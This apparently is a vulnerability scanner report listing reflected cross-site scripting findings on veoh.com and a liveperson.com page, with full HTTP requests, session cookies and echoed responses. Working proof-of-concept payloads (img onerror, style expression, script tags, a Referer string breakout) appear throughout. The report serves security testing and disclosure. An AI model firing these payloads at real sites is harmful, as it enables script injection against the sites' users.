GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4420 Date: Thu, 03 Feb 2011 21:46:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=34
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4446 Date: Thu, 03 Feb 2011 21:46:52 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4498 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=49
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4550 Date: Thu, 03 Feb 2011 21:46:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=81
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:21 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 26859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick=""> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:08 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=67 Content-Length: 59484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:43 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 59675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 60152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=62 Content-Length: 59961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=88 Content-Length: 32282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=63 Content-Length: 30205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d839'-alert(1)-'88ff7fe44ab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8d839'-alert(1)-'88ff7fe44ab
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 17:52:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D8d839%27%2Dalert%281%29%2D%2788ff7fe44ab; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=IKKOGOICDOJPFCIEFKNGGLFL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff882"><script>alert(1)</script>9cbb95e5ed5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
